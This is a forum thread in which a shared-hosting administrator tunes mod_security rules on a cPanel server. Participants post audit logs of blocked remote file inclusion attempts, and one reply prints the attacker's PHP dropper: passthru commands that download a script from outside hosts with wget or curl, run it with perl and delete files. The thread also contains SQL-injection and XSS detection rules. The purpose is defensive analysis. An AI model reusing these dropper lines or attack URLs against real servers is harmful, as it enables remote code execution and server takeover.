Results 1 to 36 of 36
  1. #1

    mod security problem

    After cpanel's bug (1711 open bugs as of now, sad) with its nightly update erasing custom rules, I am trying to find the best rules for the below environment

    cpanel
    centos 4x
    shared / resellers
    same server services, default (mail, web, database, etc)

    Gotroot is broken
    (shows 503's every time I click a link).

    Anyone, what would one suggest to use for mod security rules w/o slowing apache down dramatically? Please tip me on this

  2. #2
    Join Date
    Oct 2004
    Location
    India
    Posts
    491
    You can create your custom rules that genrally combines few of the Gotroot rules and others that are distributed.
    ESC :wq!

  3. #3
    I asked for advice.

  4. #4
    Join Date
    Oct 2004
    Location
    Kerala, India
    Posts
    4,750
    I use my custom rules. Any way did you have a look at http://www.eth0.us/mod_security

  5. #5
    Quote Originally Posted by The Blind Can See
    I asked for advice.
    He gave you advice. But you are asking for specific rulesets, which is not what he gave you.

    I haven't really seen anyone willing to share their mod_security rulesets, nor do I know which are optimal for cPanel (as I use Plesk) or else I'd be happy to oblige.

  6. #6
    Why would someone not share their rulesets? That makes no sense. Its not like I asked for their IP/domain and their security setup. eth00 listed his (and I use it) but others have complained it was too basic. That is why this thread was opened.

  7. #7
    Join Date
    Oct 2004
    Location
    Ohio
    Posts
    1,641
    Your best bet is to look at the apps running on your server and build a rule set to match. Gotroot has lots of rules to choose from and everyones setup is different. What works for one person may not for another.
    Last edited by anon-e-mouse; 09-08-2006 at 06:03 PM. Reason: Sig removed by request.

  8. #8
    People keep saying "build your own ruleset" but I have no idea how. Are you saying just pick this and that, compile them? Well, as stated in the first post gotroot is giving me 503 errors so clearly that won't work.

    I did also mention clearly what apps are on the server

    "same server services, default (mail, web, database, etc)"

    That means whatever cpanel provides by default is all that is there, plus fantastico as well. If you want more details, I do not know what else to give you. Maybe security apps? That would be most of rfxnetwork's apps, mod security (no kidding), nothing else I can think of at this moment.

  9. #9
    Join Date
    Oct 2004
    Location
    Ohio
    Posts
    1,641
    You need to look at everything your clients are running and everything that they may interface with via your server (webmail, phpmyadmin). Once you know that, you can start selecting rules from the gotroot set and others that are around. Did you install all the rules from the gotroot set? You need to pick and choose wisely or you will experience the results you have mentioned earlier. Like I said before, everyone has a different server, and what might work for them, might not work for you. Have you even looked at the mod_sec docs to see how to create rules? Have you searched the forums? Your question has been asked may times and a quick search should provide plenty of reading material.


    If you arent comfortable with creating your own rule set, hire someone who can do it for you.

  10. #10
    Quote Originally Posted by Chris_M
    Did you install all the rules from the gotroot set?
    This is unbelievable. This is the THIRD time I stated that the links on gotroot are giving me 503 errors. What the hell is wrong with everyone that they do not read carefully?

    As for searching the forums, the advanced search is the most painfully slow search function I've witnessed on any forum, that is why I have not searched. Any other forums' advanced search (vbulletin) is normal speed (yes even thousands of members at once). No kidding, anytime I attempt to do a search it sits there for more than 2 -3 minutes. That is not normal.

    I am comfortable with creating rules by compiling *suggested* rules which I originally asked for in the first post. It was a simple question and I provided all the apps info as well, why is this not enough? How should one search 400 domains on the server per each clients apps? Thats virtually impossible.

  11. #11
    Join Date
    Oct 2004
    Location
    Ohio
    Posts
    1,641
    These urls work for me. http://www.gotroot.com/downloads/ftp...-latest.tar.gz
    http://www.gotroot.com/downloads/ftp...-latest.tar.gz
    http://www.gotroot.com/downloads/ftp...ity/rules.conf

    Like I said earlier, you are still going to want to pick over the rules and only use the ones that apply to your situation. If you install the entire gotroot rule set, it will most likely bog down your box.

    You should still use the search feature. Just because it takes a while doesnt mean you wont get the answer you are looking for, and lots of times its faster than posting here complaining that you cant find what you want and that no one will help you. You wasted a full day on this when you could have had answers in a few minutes. Search is your friend.

  12. #12
    rules.conf caused apache to fail

    'Installed Version: 1.9.1-1.8' of mod-security

    I tried the attached method...
    Attached Files Attached Files

  13. #13
    Join Date
    Oct 2004
    Location
    Ohio
    Posts
    1,641
    Have you read any of the mod_sec documents? Have you searched yet?

  14. #14
    Join Date
    Jul 2003
    Location
    Goleta, CA
    Posts
    5,550
    Uninstall mod security from whm and then install it correctly by downloading the latest stable version from modsecurity.org and following the myriad of guides out there.
    Patron: I'd like my free lunch please.
    Cafe Manager: Free lunch? Did you read the fine print stating it was an April Fool's joke.
    Patron: I read the same way I listen, I ignore the parts I don't agree with. I'm suing you for false advertising.
    Cafe Owner: Is our lawyer still working pro bono?

  15. #15
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by The Blind Can See
    This is unbelievable. This is the THIRD time I stated that the links on gotroot are giving me 503 errors. What the hell is wrong with everyone that they do not read carefully?
    Maybe if you call the posters some names they will jump up and post their rules for you. There is nothing like an insult to get people motivated. I know we should read the thread carefully before posting, but we are all guilty of "skimming" the posts sometimes. In any case, the people posting are still trying to help.


    Quote Originally Posted by The Blind Can See
    It was a simple question and I provided all the apps info as well, why is this not enough? How should one search 400 domains on the server per each clients apps? Thats virtually impossible.
    Actually, you didn't provide enough information for a complete set up rules. As an example, you have cPanel. Do you have any customers using FrontPage extensions? That will make a difference. What about scripts? Do you customers have any of the add-on scripts loaded?

    I suggest you start with the rules you have (http://www.eth0.us/mod_security) and add to them. gotroot is normally good, but it seems they might be having probems. Then watch your audit_log for errors that are false hits. You can then turn off or edit the rules until you get it working they way you want.

    I don't recommend the Cpanel version. Instead check out http://www.modsecurity.org. They also have a set up rules available on their http://www.modsecurity.org/download/index.html page. Here is the link http://www.modsecurity.org/download/...current.tar.gz

    Good luck.

  16. #16
    I did not insult anyone. I find it hard to trust any "help" from people who do not pay attention to their own native language. I appreciate the help, but its frustrating when you have to repeat something THREE TIMES.

    http://www.modsecurity.org/documenta...on.html#N10083

    I'm tring this out on webmin vps (testing)...

    I went to
    "Static installation with Apache 1.x"

    I only installed webmin by itself so far, plus centos devl tools

    [[email protected] apache1]# cp mod_security.c ./src/modules/extra
    cp: cannot create regular file `./src/modules/extra': No such file or directory

  17. #17
    Quote Originally Posted by Dacsoft
    Do you have any customers using FrontPage extensions? That will make a difference. What about scripts? Do you customers have any of the add-on scripts loaded?
    That's another example of one who does not pay attention too. Surely you had no problem starting off extremely sarcastic right?

    Quote Originally Posted by the blind can see
    How should one search 400 domains on the server per each clients apps? Thats virtually impossible.
    Quote Originally Posted by the blind can see
    That means whatever cpanel provides by default is all that is there, plus fantastico as well.
    So as we can see, 400 domains, fantastico. Does this answer your question?

  18. #18
    Join Date
    Sep 2000
    Location
    Alberta, Canada
    Posts
    3,109
    Quote Originally Posted by The Blind Can See
    I appreciate the help, but its frustrating when you have to repeat something THREE TIMES.
    Welcome to the World of Forums.

    Sounds like you need to thicken your skin a bit. Pride will be your downfall if you expect people to; A) reply at all, B) reply in a manner of your expectations.

    Posting questions in a Forum is like a pot-luck Dinner; you get what you get.


    As to your original post/problem, you haven't mentioned what resulted from what should be, your first line of contact: Your DC. Did you question them on this? Many have excellent rules they are willing to share / setup, although, some DCs are more accomodating than others.

    Although it's nice when someone provides an answer or post that provides everything you need in a manner you can readily understand, that rarely happens. Most times it's a give 'n take, back 'n forth, exchange of information. Similar to another post of yours, which you seem to have given up on.

    Best advice, if you have a production Server(s) with problems, then it is in your best interest "and" your Clients to fix the problems ASAP. Hiring someone should not be out of the question which will allow you to learn at your leasure.
    PotentProducts.com - for all your Hosting needs
    Helping people Host, Create and Maintain their Web Site
    ServerAdmin Services also available

  19. #19
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,683
    If you have to repeat yourself three times, it's worth considering that you may not have expressed yourself clearly (in the view of OTHERS) the first two times. Remember, anyone commenting here is doing so out of the kindness of their own heart and you have to be crystal clear to get exact help.

    Having said that, I would recommend www.eth0.us 's rules -- in particular you want to make sure you cover Bcc as a payload - good giveaway of a spammer script hijack attempt - and he does cover those. From then on it's a matter of reading the rules out there (eg gotroot, but there are others) and selecting the ones that are relevant and useful to you. There's a danger with loading large amounts of rules into mod_security that legitimate pages may be blocked; just be aware of and ready for that.

    With respect to gotroot, since it's up for others you may want to look at accessing it from elsewhere, since others can use the links.

  20. #20
    I uninstalled mod sec via cpanel addon modules and installed it manually according to eth0's tutorial. However, as it appears said in his guideline, I pasted his rules inside httpd.conf (is this normal or what?)

    Is his rules fair enough for the specs I mentioned?

  21. #21
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by The Blind Can See
    I uninstalled mod sec via cpanel addon modules and installed it manually according to eth0's tutorial. However, as it appears said in his guideline, I pasted his rules inside httpd.conf (is this normal or what?)

    Is his rules fair enough for the specs I mentioned?
    For a smaller ruleset, you can paste directly into the httpd.conf file. I normally keep my rules separated and use the Include command to add the rules.

    The eth0 rules are a good start and provide some security. They are pretty safe for using on a server with the software you have, and probably won't cause problems for your users. I would suggest you probably add some additional ones as you find them. It is hard to tell somebody else what rules to use. I have a friend with a server the same as you. I put my ruleset on his site and he started complaining about his personal scripts not working (probably bad coding). You can add more rules and monitor the audit_log for problems.

    I know that searching for mod_security isn't very useful on this forum - there are way too many threads. You might try searching on some of the mod_security commands. I just did a search on SecFilterSelective and received better results. One was http://www.webhostingtalk.com/showthread.php?t=507339 which has some good rules.

    One that I like is: http://www.webhostingtalk.com/showth...=215612&page=2 On this page is a set of rules by user: rfxn This is the individual who wrote APF, BFD, and others. He also shows how to use the files using the #include.

    Good luck

  22. #22
    Join Date
    Jan 2002
    Location
    Boston
    Posts
    5,010
    Quote Originally Posted by Dacsoft
    I don't recommend the Cpanel version. Instead check out http://www.modsecurity.org. They also have a set up rules available on their http://www.modsecurity.org/download/index.html page. Here is the link http://www.modsecurity.org/download/...current.tar.gz

    Good luck.
    Have you had problems with cPanels install of mod_sec? I had mine manually installed prior to when cPanel started adding it and it created all kinds of issues with apache right away. Had to remove mine and install the one they offer and just copy the rules over to get apache running again.

  23. #23
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by okihost
    Have you had problems with cPanels install of mod_sec? I had mine manually installed prior to when cPanel started adding it and it created all kinds of issues with apache right away. Had to remove mine and install the one they offer and just copy the rules over to get apache running again.
    Shows how things are different for different people. I had just the opposite experience.

    I have always used the manual install. When cpanel first offered it I decided to remove mine and use theirs. I thought it would be easier to manage all my servers that way. I don't remember the problems that I had, but I had enough that I reinstalled it manually. I haven't tried the Cpanel version again, so I can't say it has any problems.

  24. #24
    Join Date
    Jan 2005
    Location
    Scotland, UK
    Posts
    2,549
    Hello,

    I suggest you signup to http://secunia.com/secunia_security_advisories/ , and start building your rules using this.

    You should use this to keep up to date with software you and your clients use, such as blog/forums/gallerys and so on. The next thing to do would be to use a ruleset such as the one eth00 provides, however run this for a week or two and then view your audit_log(the path will be defined in your settings, generally the ones posted will be /usr/local/apache/logs/audit_log) , and go over this to see what are legitimate blocks and what are false. Then you can make the decision to see what is most effective and what is blocking legitimate requests. You may want to repeat his step for around a month then you can make the decision to remove rules that are not having any hits.

    Once that's complete all you have to do is keep up to date with rulesets, such as using the mailing list I presented above. Just keep in mind, you only need rules for the things that will effect you, otherwise your rules will be huge and this will do nothing other than harm your performance.

    -Scott
    Server Management - AdminGeekZ.com
    Infrastructure Management, Web Application Performance, mySQL DBA. System Automation.
    WordPress/Magento Performance, Apache to Nginx Conversion, Varnish Implimentation, DDoS Protection, Custom Nginx Modules
    Check our wordpress varnish plugin. Contact us for quote: [email protected]

  25. #25
    Thanks for the responses.

    Here is what I did.

    I added "include.." in httpd.conf and created their respective files

    I added eth0's set, plus rules.conf and rookits.conf from gotroot
    http://www.gotroot.com/downloads/ftp/mod_security/

    Logs in audit show this so far:

    Code:
    [email protected] [/etc/httpd/conf]# tail -f /etc/httpd/logs/audit_log
    User-Agent: libwww-perl/5.805
    mod_security-action: 403
    mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
    
    HTTP/1.1 403 Forbidden
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
    --3d46e519--
    
    ==23bb7470==============================
    Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
    ----------------------------------------
    GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
    Connection: TE, close
    Host: www.hosteddomain.com
    TE: deflate,gzip;q=0.3
    User-Agent: libwww-perl/5.805
    mod_security-action: 403
    mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
    
    HTTP/1.1 403 Forbidden
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
    --23bb7470--
    Does this look ok?

  26. #26
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by The Blind Can See
    Thanks for the responses.

    Here is what I did.

    I added "include.." in httpd.conf and created their respective files

    I added eth0's set, plus rules.conf and rookits.conf from gotroot
    http://www.gotroot.com/downloads/ftp/mod_security/


    Does this look ok?
    Looks like it is working already. The second one (serverPath=http://trendpresent.de/images/root.txt) appears to be trying to gain access to the server. Here is what it is trying to do:
    Code:
    <?
     passthru('cd /tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /tmp;lynx -source ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
     passthru('cd /tmp;fetch ttp://trendpresent.de/sht >sh;perl sh;rm -f *');
     passthru('cd /tmp;GET ttp://trendpresent.de/sh >sh;perl sh;rm -f *');
    
     passthru('cd /dev/shm;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /dev/shm;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /dev/shm;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /dev/shm;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /dev/shm;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /dev/shm;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
    
     passthru('cd /var/tmp;wget http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /var/tmp;curl -O http://trendpresent.de/sh;perl sh;rm -f *');
     passthru('cd /var/tmp;lwp-download http://trendpresent.de/sh;perl sh.txt;rm -f *');
     passthru('cd /var/tmp;lynx -source http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /var/tmp;fetch http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     passthru('cd /var/tmp;GET http://home.arcor.de/pwnz/sh >sh;perl sh;rm -f *');
     ?>
    I suggest you consider disabling some functions in php.ini (like passthru) unless you really need them on.

  27. #27
    Thanks for the info...here's a question...where did you get these logs from? I didn't post that

  28. #28
    Here is more...


    One is for my forum, gives 403 when attempting to save updated vbulletin template
    Attached Files Attached Files
    Last edited by The Blind Can See; 09-10-2006 at 02:57 PM.

  29. #29
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by The Blind Can See
    Thanks for the info...here's a question...where did you get these logs from? I didn't post that
    Actually I got it from your post where you gave what was in the audit_log. Your second entry was:
    ==23bb7470==============================
    Request: www.hosteddomain.com 70.87.119.68 - - [10/Sep/2006:13:12:32 -0500] "GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1" 403 437 "-" "libwww-perl/5.805" - "-"
    ----------------------------------------
    GET /forum//calendar/setup/header.inc.php?serverPath=http://trendpresent.de/images/root.txt? HTTP/1.1
    Connection: TE, close
    Host: www.hosteddomain.com
    TE: deflate,gzip;q=0.3
    User-Agent: libwww-perl/5.805
    mod_security-action: 403
    mod_security-message: Access denied with code 403. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"][rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"]
    I looked at the line at the top that starts with "GET". If you check, it shows the link that was being called. It was: serverPath=http://trendpresent.de/images/root.txt

    If you check that link, it is what I posted.

  30. #30
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by The Blind Can See
    Here is more...


    One is for my forum, gives 403 when attempting to save updated vbulletin template
    Your server is pretty busy protecting you. Good think you have mod_security installed. Here is another hacker trying to get in - that was stopped:
    GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sylviawebster.f2s.com/mmf/extWiki//htdocs/files/c99shell_r16.txt

    I imagine the rule stopping your update is the one with alter|create|drop in it. You can either turn that rule off, allow it for your site only, or turn it off only when you need to update the theme.

  31. #31
    Thanks..... that is the same line that gave me the 403 in my site

    Code:
    #Generic SQL sigs
    SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
    how do I disable it for one site?

  32. #32
    By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?


  33. #33
    Join Date
    May 2003
    Location
    Florida
    Posts
    877
    Quote Originally Posted by The Blind Can See
    By the way, anyone have a remedy for losers who have nothing better to do than to attempt to hack others all day long?

    Not really much you can do. One thing I have seen done is to change the line:
    SecFilterDefaultAction "deny,log,status:403"

    To something like:
    SecFilterDefaultAction "deny,log,redirect:http://www.google.com"

    This would redirect them to google instead of your site. I guess you could also direct them somebody better. Won't stop them.


    It would be good if somebody would write a mod_security rule that adds them to the firewall deny.

  34. #34
    Join Date
    May 2003
    Location
    behind your business
    Posts
    69
    Quote Originally Posted by The Blind Can See
    Thanks..... that is the same line that gave me the 403 in my site

    Code:
    #Generic SQL sigs
    SecFilterSelective ARGS "((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)" "id:300015,rev:1,severity:2,msg:'Generic SQL injection protection'"
    how do I disable it for one site?
    Add in httpd.conf under his VirtualHost

    <VirtualHost IP:80>
    .
    .
    SecFilterRemove 300015
    .
    </VirtualHost>

    -asc2000-

  35. #35
    I'll try that..here's another problem. Cannot publish through frontpage (oddly, it worked a few times and suddenly stopped, AFTER the rules were already applied)

    apache log:

    [Sun Sep 10 21:02:57 2006] [error] [client xx.xx.xx] mod_security: Access denied with code 403. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\\\s]*=)|(url[\\\\s]*[\\\\(]))[\\\\s]*[\\\\'\\"]*[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*j[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*v[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*a[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*s[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*c[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*r[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*i[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*p[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*t[\\\\x09\\\\x0a\\\\x0b\\\\x0c\\\\x0d]*[\\\\:]" at POST_PAYLOAD [hostname "mydomain.com"] [uri "/_vti_bin/_vti_aut/author.exe"]

    I removed these two from modsec.conf

    SecFilterSelective POST_PAYLOAD "cc:"
    SecFilterSelective POST_PAYLOAD "cc:\x20"

    Still doesn't publish (403 error)

    I even added this

    ###########################################
    #Front page exclusions
    ###########################################
    < LocationMatch "/_vti_bin/_vti_aut/author.exe" >
    SecFilterInheritance Off
    < /LocationMatch >

    Caused apache to fail

  36. #36
    The line causing the 403 is

    Code:
    SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]"
    I would like to keep it there and add some sort of frontpage exception that will work. Please help

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •